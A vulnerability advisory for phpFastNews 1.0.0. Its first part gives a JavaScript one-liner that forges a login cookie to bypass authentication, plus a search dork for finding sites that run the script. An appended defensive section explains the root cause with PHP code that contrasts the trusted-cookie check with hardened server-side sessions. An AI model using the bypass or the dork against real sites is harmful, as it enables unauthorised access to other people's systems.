# Title : phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability
# Published : 2008-10-18
# Author : Qabandi
#################################################
## Qabandi iqa[at]hotmail.fr ##
## from Kuwait ##
#################################################
\ phpFastNews
// Insecure cookie handling
\
// Go to any website that has the script installed
\ type the following code into the Address Bar
//
\ javascript:document.cookie = "fn-loggedin = 1";
//
\ Refresh, do whatever, and you will be logged in
//
\ Dork:intext:"Powered by phpFastNews"
#################################################
## Greetz: Killer Hack, Str0ke ##
#################################################
PEACE
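
The root cause in the advisory above is that login state is read from a cookie value the browser controls. The sketch below is an added example, not phpFastNews source and not the author's code: it puts that weak pattern beside a server-side session check. Only the cookie name `fn-loggedin` comes from the advisory; the function names, the session key `fn_logged_in`, the password-hash login and the HTTPS assumption are hypothetical.

```php
<?php
// Added illustration. Hypothetical code: the advisory shows only the
// cookie name, not how phpFastNews actually reads it.

// Weak pattern: the login decision trusts a value supplied by the browser.
function is_admin_weak(array $cookies): bool
{
    return isset($cookies['fn-loggedin']) && $cookies['fn-loggedin'] == 1;
}

// Hardened pattern: the browser holds only a random session ID;
// the login flag is stored on the server.
function start_secure_session(): void
{
    ini_set('session.use_strict_mode', '1'); // reject IDs the server did not issue
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,      // assumption: the site is served over HTTPS
        'httponly' => true,      // not readable from document.cookie
        'samesite' => 'Strict',
    ]);
    session_start();
}

function login(string $password, string $storedHash): bool
{
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    session_regenerate_id(true);        // fresh ID on privilege change
    $_SESSION['fn_logged_in'] = true;   // hypothetical key, kept server-side
    return true;
}

function is_admin(): bool
{
    return ($_SESSION['fn_logged_in'] ?? false) === true;
}

// Constructed request data: the cookie the advisory sets by hand.
$forged = ['fn-loggedin' => '1'];

start_secure_session();            // must run before any output is sent
var_dump(is_admin_weak($forged));  // decision driven by the client-set cookie
var_dump(is_admin());              // decision driven by server-side state only
```

When reviewing similar code, search for authorization checks that read `$_COOKIE` directly; any such flag needs to move into `$_SESSION` or be protected by a server-side MAC.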